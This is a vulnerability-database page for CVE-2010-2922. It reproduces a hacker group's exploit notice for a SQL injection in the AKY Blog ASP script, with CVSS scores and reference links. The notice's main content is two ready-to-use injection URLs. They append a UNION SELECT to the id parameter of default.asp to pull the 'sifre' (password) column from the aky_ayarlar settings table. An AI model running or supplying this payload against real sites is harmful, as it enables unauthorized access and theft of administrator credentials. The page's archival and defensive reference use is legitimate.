AKY Blog remote SQL injection

2010-07-27 / 2010-07-28

Credit: Madconfig

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2010-2922

CWE: CWE-89

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

===================================================
AKY Blog SQL ?njection
===================================================
Author : Madconfig
Homepage : www.worldhackerz.com
Mail : admin[at]worldhackerz[dot].com
Script : http://www.aspindir.com/indir.asp?ID=5954&sIslem=Indir
Risk : No Risk Just Enjoy
Dork : :/ sorry
===================================================
[+] Vulnerable File :
http://www.site.com/default.asp?islem=devami&id=38%20union+select+all+0,
sifre,2,3%20,4,5+from+aky_ayarlar
===================================================
[+] Demo :
http://www.site.com/blog/default.asp?islem=devami&id=38%20union+s
elect+all+0,sifre,2,3%20,4,5+from+aky_ayarlar
===================================================
Greetz : Mezar,v0calist ,PaLa , By.ege, StreetCoder , AnqelHacker,M0sted
and all www.worldhackerz.com Member
===================================================
# Turkish P0wer

References:

http://xforce.iss.net/xforce/xfdb/60617

http://www.exploit-db.com/exploits/14461

http://secunia.com/advisories/40746

http://packetstormsecurity.org/1007-exploits/akyblog-sql.txt

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

AKY Blog remote SQL injection

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.